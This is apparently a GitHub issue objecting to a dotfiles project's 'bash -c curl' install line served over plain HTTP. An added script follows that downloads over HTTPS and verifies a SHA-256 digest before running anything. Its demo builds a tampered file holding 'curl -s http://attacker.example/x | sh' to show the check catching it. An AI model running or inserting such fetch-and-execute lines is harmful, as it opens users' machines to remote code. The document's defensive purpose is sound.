I just happened to find this project while looking for something else and stumbled across this line:
```sh
bash -c "`curl -sL get.freshshell.com`"
```
which cannot be left without opening an issue. I was astonished not to find an issue already open for this.
There are multiple problems with this:
The first and most severe is the use of plain legacy HTTP for this. Even though get.freshshell.com just redirects to GitHub, that redirect is unauthenticated, which means that anybody in between on the connection can rewrite the response from get.freshshell.com before it reaches the user. Remember that the Internet is untrusted!
That just shows me that you guys seem to favor "coolness" over the absolute minimum of security. For example, you could have decided to use the GitHub URL directly in your example, but you went with get.freshshell.com.
I encourage you to work on getting a badge here https://bestpractices.coreinfrastructure.org/ and fix any criteria you currently don’t meet.
Dotfiles are a core part of a person's work environment.
This repository seems to have 700 stars. What is going on? How many of you guys install software like this?
PS: I just saw that the last commit was back in 2014. Anyway, the README still states that it is maintained, so.
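The pattern the issue objects to, `bash -c "`curl -sL get.freshshell.com`"`, executes whatever bytes arrive over an unauthenticated HTTP connection. The script below is an added example for comparison; it is not part of the issue, the freshshell project, or its README. It shows the hardened form of the same one-liner: fetch over HTTPS only (curl's `--proto '=https'` also rejects a redirect that drops back to plain http), save to a file, compare a pinned SHA-256 digest, and run the file only on a match. The URL and the idea that the project would publish such a digest are assumptions; the demo at the bottom uses constructed files so it runs offline.

```sh
#!/bin/sh
# Added example, not code from the freshshell project.
# Hardened replacement for:   bash -c "`curl -sL get.freshshell.com`"
set -eu

# sha256_of FILE: print the hex SHA-256 (GNU coreutils or BSD/macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED_HEX: succeed only if the digests match.
verify_sha256() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# safe_install URL EXPECTED_HEX
#   --proto '=https'  refuse anything but HTTPS, including after a redirect
#   --tlsv1.2         minimum TLS version
#   -f                fail on HTTP errors instead of handing an error page to bash
# The downloaded script is never executed unless its digest matches.
# URL and digest are caller-supplied assumptions; nothing here is project-specific.
safe_install() {
    url=$1; expected=$2
    tmp=$(mktemp)
    curl --proto '=https' --tlsv1.2 -fsSL -o "$tmp" "$url"
    rc=0
    if verify_sha256 "$tmp" "$expected"; then
        bash "$tmp" || rc=$?
    else
        echo "refusing to run $url: SHA-256 mismatch" >&2
        rc=1
    fi
    rm -f "$tmp"
    return $rc
}

# Offline demonstration with constructed files: the installer as published,
# and the same download after an on-path attacker prepended a line to it.
demo() {
    good=$(mktemp); bad=$(mktemp)
    printf 'echo "installing dotfiles"\n' > "$good"
    printf 'curl -s http://attacker.example/x | sh\necho "installing dotfiles"\n' > "$bad"
    pinned=$(sha256_of "$good")   # the value a maintainer would publish alongside the script
    verify_sha256 "$good" "$pinned" && echo "genuine script: digest OK, would execute"
    verify_sha256 "$bad" "$pinned" || echo "tampered script: digest mismatch, not executed"
    rm -f "$good" "$bad"
}
demo
```

The pinned digest only helps if the user obtains it from a channel the same on-path attacker cannot rewrite (the repository page over HTTPS, or a signature checked with a key obtained out of band); publishing the digest next to the script on the same HTTP endpoint would defeat the check.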